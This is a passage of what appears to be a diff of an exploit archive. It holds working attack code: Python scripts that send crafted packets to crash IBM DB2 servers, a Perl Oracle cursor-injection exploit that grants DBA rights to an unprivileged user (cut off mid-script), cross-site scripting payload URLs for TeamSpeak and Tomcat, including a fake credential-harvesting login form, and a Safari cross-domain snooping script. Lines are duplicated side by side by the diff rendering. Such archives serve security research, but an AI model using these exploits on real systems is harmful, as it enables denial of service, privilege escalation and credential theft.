return (EXIT_SUCCESS); return (EXIT_SUCCESS);
} }
// milw0rm.com [2008-02-26] // milw0rm.com [2008-02-26]

66
platforms/multiple/dos/8344.py
View file

@ -1,33 +1,33 @@
# Discovered by Dennis Yurichev <dennis@conus.info> # Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system # DB2TEST database should be present on target system
from sys import * from sys import *
from socket import * from socket import *
sockobj = socket(AF_INET, SOCK_STREAM) sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000)) sockobj.connect ((argv[1], 50000))
sockobj.send( sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" "\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" "\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00" "\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" "\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" "\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" "\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" "\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16" "\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" "\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C" "\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62" "\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43") "\x47\x9D\x37\x88\xA8\x77\x23\x43")
sockobj.close() sockobj.close()
# milw0rm.com [2009-04-03] # milw0rm.com [2009-04-03]

180
platforms/multiple/dos/8345.py
View file

@ -1,90 +1,90 @@
# Discovered by Dennis Yurichev <dennis@conus.info> # Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system # DB2TEST database should be present on target system
# GUEST account with QQ password shoule be present on target system # GUEST account with QQ password shoule be present on target system
from sys import * from sys import *
from socket import * from socket import *
sockobj = socket(AF_INET, SOCK_STREAM) sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000)) sockobj.connect ((argv[1], 50000))
sockobj.send( sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" "\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" "\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00" "\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" "\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" "\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" "\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" "\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16" "\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" "\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18" "\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18"
"\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB" "\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB"
"\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E" "\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E"
) )
data=sockobj.recv(102400) data=sockobj.recv(102400)
sockobj.send( sockobj.send(
"\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03" "\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03"
"\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40" "\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E" "\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E"
"\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2" "\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2"
"\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1" "\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1"
"\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00" "\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00"
"\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1" "\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1"
"\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3" "\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3"
"\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16" "\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" "\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0" "\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0"
"\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00" "\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00"
"\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11" "\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11"
"\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8" "\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8"
"\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40" "\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85" "\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85"
"\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2" "\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2"
"\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1" "\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1"
) )
data=sockobj.recv(102400) data=sockobj.recv(102400)
sockobj.send( sockobj.send(
"\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC" "\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC"
"\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13" "\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13"
"\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20" "\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01" "\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01"
"\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53" "\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53"
"\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C" "\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C"
"\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E" "\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E"
"\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00" "\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00"
"\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20" "\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20" "\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30"
"\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14" "\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14"
"\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44" "\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44"
"\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00" "\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00"
"\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54" "\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54"
"\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E" "\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E"
"\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28" "\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28"
"\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21" "\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21"
"\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20" "\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20" "\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00" "\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00"
"\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00" "\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00"
"\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1" "\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1"
) )
sockobj.close() sockobj.close()
# milw0rm.com [2009-04-03] # milw0rm.com [2009-04-03]

6
platforms/multiple/dos/948.c
View file

@ -455,6 +455,6 @@ main(int argc, char **argv)
#endif #endif
return 0; return 0;
} }
// milw0rm.com [2005-04-20] // milw0rm.com [2005-04-20]

16
platforms/multiple/local/30039.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/23987/info
Multiple personal firewall products are prone to a vulnerability that lets attackers bypass protection mechanisms. This issue occurs because the applications fail to properly implement protection mechanisms based on valid process identifiers.
Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to the memory space of critical processes. This allows attackers to execute arbitrary code with elevated privileges; other attacks are also possible.
The following applications are vulnerable to this issue:
- Comodo Firewall Pro 2.4.18.184
- Comodo Personal Firewall 2.3.6.81
- ZoneAlarm Pro 6.1.744.001
Other applications and versions may also be affected.
http://www.exploit-db.com/sploits/30039-1.zip
http://www.exploit-db.com/sploits/30039-2.zip

9
platforms/multiple/remote/30025.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23933/info
TeamSpeak Server is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
TeamSpeak Server 2.0.20.1 is vulnerable; other versions may also be affected.
http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User:<inputtype="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E

15
platforms/multiple/remote/30052.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/24058/info
Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following Tomcat versions are affected:
4.0.0 to 4.0.6
4.1.0 to 4.1.36
5.0.0 to 5.0.30
5.5.0 to 5.5.23
6.0.0 to 6.0.10
http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script>

20
platforms/multiple/remote/30078.js Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/24121/info
Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions.
Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.
This issue affects Safari 2.0.4; other versions may also be affected.
var snoopWin;
function run() {
snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480');
snoopWin.blur();
setTimeout("snoopy()", 5000);
}
function snoopy() {
alert(snoopWin.location);
setTimeout("snoopy()", 5000);
}

280
platforms/multiple/remote/3375.pl
View file

@ -1,140 +1,140 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle KUPW$WORKER.MAIN exploit (10g) # Remote Oracle KUPW$WORKER.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/archive/1/440439 # REF: http://www.securityfocus.com/archive/1/440439
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007 # DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# #
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG # DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 # ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86
# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 # ORA-06512: at "SYS.KUPC$QUE_INT", line 912
# ORA-00931: missing identifier # ORA-00931: missing identifier
# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 # ORA-06512: at "SYS.KUPC$QUE_INT", line 1910
# ORA-06512: at line 1 # ORA-06512: at line 1
# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 # ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591
# ORA-06512: at "SYS.KUPW$WORKER", line 13468 # ORA-06512: at "SYS.KUPW$WORKER", line 13468
# ORA-06512: at "SYS.KUPW$WORKER", line 5810 # ORA-06512: at "SYS.KUPW$WORKER", line 5810
# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] # ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE []
# ORA-06512: at "SYS.KUPW$WORKER", line 1243 # ORA-06512: at "SYS.KUPW$WORKER", line 1243
# ORA-31626: job does not exist # ORA-31626: job does not exist
# ORA-39086: cannot retrieve job information # ORA-39086: cannot retrieve job information
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN # BEGIN
# SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--',''); # SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END; # END;
# "] at kupw-workerV2.pl line 100. # "] at kupw-workerV2.pl line 100.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
BEGIN BEGIN
